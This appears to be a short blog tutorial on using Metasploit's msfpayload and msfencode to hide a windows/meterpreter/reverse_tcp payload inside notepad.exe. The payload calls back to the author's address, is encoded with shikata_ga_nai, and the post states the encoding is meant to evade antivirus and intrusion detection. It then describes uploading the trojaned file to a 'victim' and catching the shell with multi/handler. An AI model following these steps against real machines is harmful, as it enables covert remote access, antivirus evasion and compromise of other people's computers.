MsfPayload is code that we want the system to execute and that is to be selected and delivered by the Framework. The msfpayload component of Metasploit allows you to generate shellcode. Msfpayload is located in directory /opt/framework/msf3/ . If you want to see the list of the payload just type ./msfpayload -l
MsfEncode The shellcode generated by msfpayload is fully functional, but it contains several null characters that, when interpreted by many programs, signify the end of a string, and this will cause the code to terminate before completion.
In other words, those x00s and xffs can break your payload!
In addition, shellcode traversing a network in cleartext is likely to be picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include “bad” characters. Enter msfencode -h to see a list of msfencode options. MsfEncode was located in the same directory with msfpayload.
For the example, i try to crafted file exe. This time, i crafted a notepad file.
You can see from the picture above, For the msfpayload, i use the windows/meterpreter/reverse_tcp for the payload and LHOST is 192.168.56.1 (my IP address). And for the msfencode, i use prefix -t to build the exe file, -e to use the encoder from metasploit. I use the x86/shikata_ga_nai encoder. -x to definition the location of notepad.exe, -k to keep run payload, -o to definition the output filename and then prefix -c to definite the number of times to encode the data. If you want to see the list of prefix, you can see when the first time you run the msfencode.
If we succes to craft it, then will appear the information like this.
If we want to proof if the file has been created just typed command ls.
next step, upload that file to the victim from the meterpreter on msf. Just type a command upload /opt/framework/msf3/tes.exe C:\. It means we want to upload file tes.exe that located in directory /opt/framework/msf3 to the directory C:\ in computer victims
Well then, i use the exploit multi handler to exploit the victim.
Then run the exploit. If the tes.exe file that we have uploaded is running by the victims, then we will success to entry it.
Succes
No comments:
Post a Comment